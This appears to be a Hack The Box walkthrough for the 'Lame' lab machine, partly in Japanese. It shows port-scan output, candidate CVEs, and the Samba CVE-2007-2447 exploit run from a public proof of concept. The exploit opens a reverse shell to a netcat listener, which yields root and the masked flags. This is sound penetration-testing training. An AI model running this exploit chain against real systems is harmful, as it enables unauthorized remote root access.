HTB Lame walkthrough
Foothold
$ rustscan -a 10.129.226.162 --ulimit 5000 -- -sV -A -Pn .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- 🌍HACK THE PLANET🌍 [~] The config file is expected to be at "/home/kali/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 10.129.226.162:22 Open 10.129.226.162:21 Open 10.129.226.162:139 Open 10.129.226.162:445 Open 10.129.226.162:3632 [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}") Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. [~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-24 21:35 JST (snip) PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 2.3.4 | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.16.15 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBALz4hsc8a2Srq4nlW960qV8xwBG0JC+jI7fWxm5METIJH4tKr/xUTwsTYEYnaZLzcOiy21D3ZvOwYb6AA3765zdgCd2Tgand7F0YD5UtXG7b7fbz99chReivL0SIWEG/E96Ai+pqYMP2WD5KaOJwSIXSUajnU5oWmY5x85sBw+XDAAAAFQDFkMpmdFQTF+oRqaoSNVU7Z+hjSwAAAIBCQxNKzi1TyP+QJIFa3M0oLqCVWI0We/ARtXrzpBOJ/dt0hTJXCeYisKqcdwdtyIn8OUCOyrIjqNuA2QW217oQ6wXpbFh+5AQm8Hl3b6C6o8lX3Ptw+Y4dp0lzfWHwZ/jzHwtuaDQaok7u1f971lEazeJLqfiWrAzoklqSWyDQJAAAAIA1lAD3xWYkeIeHv/R3P9i+XaoI7imFkMuYXCDTq843YU6Td+0mWpllCqAWUV/CQamGgQLtYy5S0ueoks01MoKdOMMhKVwqdr08nvCBdNKjIEd3gH6oBk/YRnjzxlEAYBsvCmM4a0jmhz0oNiRWlc/F+bkUeFKrBx/D2fdfZmhrGg== | 2048 5656240f211ddea72bae61b1243de8f3 (RSA) |_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew== 139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd syn-ack distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 58787/tcp): CLEAN (Timeout) | Check 2 (port 13873/tcp): CLEAN (Timeout) | Check 3 (port 58565/udp): CLEAN (Timeout) | Check 4 (port 53271/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_smb2-security-mode: Couldn't establish a SMBv2 connection. | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2023-07-24T08:36:14-04:00 |_smb2-time: Protocol negotiation failed (SMB2) | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_clock-skew: mean: 2h00m21s, deviation: 2h49m43s, median: 20s NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 21:36 Completed NSE at 21:36, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 21:36 Completed NSE at 21:36, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 21:36 Completed NSE at 21:36, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.86 seconds
- vsftpd 2.3.4=>vsftpd 2.3.4 backdoor(not work???)
- OpenSSH 4.7p1=>CVE-2008-5161など
- Samba smbd 3.0.20=>CVE-2007-2447(https://github.com/amriunix/CVE-2007-2447)
- distccd v1=>CVE-2004-2687(https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
User&Root
色々あったがSamba smbd 3.0.20 => CVE-2007-2447はroot直撃!!!!
$ git clone https://github.com/amriunix/CVE-2007-2447 Cloning into 'CVE-2007-2447'... remote: Enumerating objects: 11, done. remote: Total 11 (delta 0), reused 0 (delta 0), pack-reused 11 Receiving objects: 100% (11/11), done. Resolving deltas: 100% (3/3), done. $ cd CVE-2007-2447 $ ls README.md usermap_script.py $ python usermap_script.py [*] CVE-2007-2447 - Samba usermap script [-] usage: python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT> $ python usermap_script.py 10.129.226.162 445 10.10.16.15 4444 [*] CVE-2007-2447 - Samba usermap script [+] Connecting ! [+] Payload was sent - check netcat !
$ rlwrap nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.16.15] from (UNKNOWN) [10.129.226.162] 60922 id uid=0(root) gid=0(root) cat /root/root.txt cf************************************** ls /home ftp makis service user ls /home/makis user.txt cat /home/makis/user.txt 52*************************************